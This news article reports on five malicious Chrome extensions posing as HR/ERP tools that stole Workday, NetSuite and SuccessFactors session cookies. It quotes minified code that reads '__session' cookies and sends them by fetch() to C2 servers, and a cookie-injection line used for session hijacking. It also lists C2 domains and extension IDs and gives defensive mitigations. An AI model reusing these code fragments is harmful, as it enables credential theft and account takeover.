In a brazen assault on corporate America’s most sensitive systems, five malicious Chrome extensions masqueraded as productivity boosters for HR and ERP platforms, siphoning authentication tokens and sabotaging security responses. Discovered by supply-chain security firm Socket on January 15, 2026, the extensions targeted juggernauts like Workday, NetSuite, and SAP SuccessFactors, collectively racking up over 2,300 installs before Google yanked them from the Chrome Web Store. “The extensions work in concert to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking,” Socket security researcher Kush Pandya wrote.

Published under developers databycloud1104 and Software Access, the extensions—DataByCloud Access (ID: oldhjammhkghhahhhdcifmmlefibciph), Tool Access 11 (ID: ijapakghdgckgblfgjobhcfglebbkebf), Data By Cloud 2 (ID: makdmacamkifdldldlelollkkjnoiedg), Data By Cloud 1 (ID: mbjjeombjeklkbndcjgmfcdhfbjngcam), and Software Access (ID: bmodapcihjhklpogdpblefpepjolaoij)—promised streamlined workflows for users juggling multiple enterprise accounts. Data By Cloud 2 alone snagged 1,000 users with its polished dashboard touting ‘premium tools,’ while Tool Access 11 pitched restrictions on ‘special tools’ to avert compromises. Yet their privacy policies falsely vowed no data collection, omitting cookie theft and page blocking entirely, as detailed in BleepingComputer’s January 16 report.

These weren’t opportunistic grabs; the campaign deployed three synchronized tactics. First, relentless cookie exfiltration: every 60 seconds, scripts plucked ‘__session’ cookies from targets like myworkday.com, netsuite.com, and successfactors.com, encrypting and beaming them to C2 servers at api.databycloud.com or api.software-access.com. Code patterns were identical across extensions, per Socket’s teardown.

Exfiltration Engineered for Persistence

The theft mechanism relied on Fetch API calls, as in this snippet from DataByCloud Access: y=e=>chrome.cookies.getAll({domain:e}); n=e=>decodeURIComponent(e?.filter((e=>"__session"===e.name))?.[0]?.value||""); const c=e.base_url?e.base_url:t+"/api/v1/mv3"; await fetch(c+a+(n||""),m). This heartbeat ensured attackers harvested fresh tokens indefinitely, bypassing MFA via session validity. “By setting authentication cookies via the C2, the attackers could take over authenticated sessions without entering usernames, passwords, or multi-factor authentication codes,” Socket explained, enabling seamless pivots into payroll, personnel data, and beyond.

Compounding the breach, DOM manipulation crippled remediation. Tool Access 11 blanked 44 Workday admin pages—authentication policies, IP ranges, session controls—via XPath detection and innerHTML wipes, redirecting to bogus home.htmld endpoints. Data By Cloud 2 escalated to 56 pages, neutering password resets, account deactivations, 2FA tweaks, and audit logs, even in Workday’s sandbox at workdaysuv.com. A MutationObserver loop and 30-minute reloads kept blocks ironclad. “Attempts to change passwords, deactivate accounts, adjust security policies, or review sign-on history are silently neutralized,” GBHackers noted on January 19.

The crown jewel: bidirectional hijacking in Software Access. It not only stole but injected attacker-supplied cookies using chrome.cookies.set(), parsing payloads, purging victim cookies, and overwriting sessions. “This installs the victim’s authentication state directly into the threat actor’s browser session,” Socket detailed, quoting the injection logic: await Promise.all(cookies.map(cookie => setCookie(clean(cookie, url)).catch(e => null))).

Defensive Radar Sweeps for Rivals

Paranoia laced the code: all five scanned for 23 rival security extensions—EditThisCookie (fngmhnnpilhplaeedifhccceomclgfbg), Cookie-Editor (hlkenndedednhfkekhgcdicdfddnkalmdm), ModHeader (idgpnmonknjnojddfkpgkljpfnnfcklj), Redux DevTools, SessionBox (mpoceiclggbdkloafnlhlegknfcgomhd), and more—flagging them to C2 via chrome.management API. Data By Cloud 1 and Software Access layered anti-debugging with DisableDevtool library and password field masking, thwarting inspections.

Despite two publishers and emails like admin@databycloud.com, shared infrastructure screamed coordination: identical C2 paths (/api/v1/mv3), security lists, obfuscation, and targets. Permissions mimicked legit integrations—cookies, scripting, declarativeNetRequest—for HR multitaskers. “The extensions target the same enterprise platforms and share identical security tool detection lists, API endpoint patterns, and code structures, indicating a coordinated operation,” Infosecurity Magazine reported January 19, quoting Pandya: “The coordinated deployment of cookie theft, administrative blocking, and session hijacking across five extensions represents a sophisticated attack on enterprise HR and ERP platforms.”

Impact loomed large for Fortune 500s reliant on these platforms for employee data, salaries, compliance. A single foothold could spark ransomware or espionage, with stolen sessions fueling lateral moves. Though installs were modest, enterprise value amplified risks. “The combination of continuous credential theft, administrative interface blocking, and session hijacking creates a scenario where security teams can detect unauthorized access but cannot remediate through normal channels,” The Hacker News warned January 17.

Socket’s Swift Strike and Google’s Response

Socket’s January 15 blog triggered takedowns; by BleepingComputer’s January 16 publish, extensions vanished from the Web Store, though lingering on Softonic. No victim firms named, but Socket urged log hunts for anomalous IPs/sessions. Enterprises faced Chrome sync pitfalls: tainted extensions propagating across fleets.

Mitigation mandates were blunt. Users: uninstall by ID, reset credentials from clean browsers, scrub sync. Teams: deploy Chrome Enterprise allowlists, DNS-block C2 (api.databycloud.com, api.software-access.com, wss://api.software-access.com), audit extensions mimicking HR tools, force MFA re-enrollment. “Implement Chrome Enterprise extension allowlists to prevent installation of unauthorized extensions,” Infosecurity Magazine echoed Pandya. Socket invoked MITRE ATT&CK: T1539 (Steal Web Session Cookie), T1185 (Browser Session Hijacking), T1176.001 (Browser Extensions).

“Similar patterns targeting other enterprise platforms should be anticipated,” Pandya cautioned, hinting at actor evolution. Disposable domains (404s, SSL flops) underscored opsec. For CISOs, this spotlights browser extensions as unmanaged vectors—permissions unchecked, updates blind. In HR/ERP realms, where one admin session unlocks troves, vigilance now demands allowlisting and behavioral guards.

Broader Ripples in Extension Trust

This salvo follows Socket’s December 2025 Phantom Shuttle bust—VPN fakes proxying 170+ domains—and underscores Chrome Web Store vetting gaps. Enterprises must treat extensions as code, scanning via Socket.dev or peers. Pandya’s team remains on the hunt, dissecting disposable infra for ties. As HR platforms digitize identities, such hijacks threaten not just data, but operational paralysis—security sees intruders, yet hands are tied.